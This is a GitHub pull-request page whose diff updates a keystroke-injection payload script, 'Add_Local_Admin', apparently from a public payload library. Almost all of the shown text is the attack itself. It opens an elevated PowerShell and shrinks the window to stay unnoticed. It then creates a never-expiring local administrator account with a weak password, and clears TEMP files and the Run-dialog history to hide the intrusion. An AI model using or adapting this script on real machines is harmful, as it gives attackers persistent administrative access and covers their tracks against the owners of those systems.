Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update payload.txt #232

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Update payload.txt #232

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
83 changes: 50 additions & 33 deletions payloads/library/execution/Add_Local_Admin/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,71 +1,88 @@
REM Title: Add_Local_Admin
EM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: Administrator PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
REM Target: Windows 10 and 11
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Version: 2.0
REM Category: Execution

GUI x
GUI r
DELAY 500
a
STRING powershell -Command "Start-Process PowerShell -Verb RunAs"
DELAY 500
ENTER
DELAY 500
ALT y
Delay 2000

DELAY 1000
STRING PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
DELAY 1000
ENTER
DELAY 1000
STRING $Username = "Admin2"
DELAY 2000
DELAY 1000
ENTER
STRING $Password = "password"
DELAY 2000
DELAY 1000
ENTER
STRING $group = "Administrators"
DELAY 2000
DELAY 1000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
DELAY 1000
ENTER
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
DELAY 5000
DELAY 1000
ENTER
STRING if ($existing -eq $null) {
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
STRING Write-Host "Creating new local user $Username."
DELAY 1000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 1000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
STRING Write-Host "Adding local user $Username to $group."
DELAY 1000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
STRING & NET LOCALGROUP $group $Username /add
DELAY 1000
ENTER
STRING }
DELAY 2000
DELAY 1000
ENTER
STRING {
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
STRING Write-Host "Setting password for existing local user $Username."
DELAY 1000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
STRING $existing.SetPassword($Password)
DELAY 1000
ENTER
STRING }
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
DELAY 1000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
DELAY 1000
ENTER
DELAY 1000
STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
DELAY 500
ENTER
DELAY 500
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
DELAY 500
ENTER
DELAY 200
STRING exit
DELAY 200
ENTER
DELAY 200
STRING exit
DELAY 100
DELAY 200
ENTER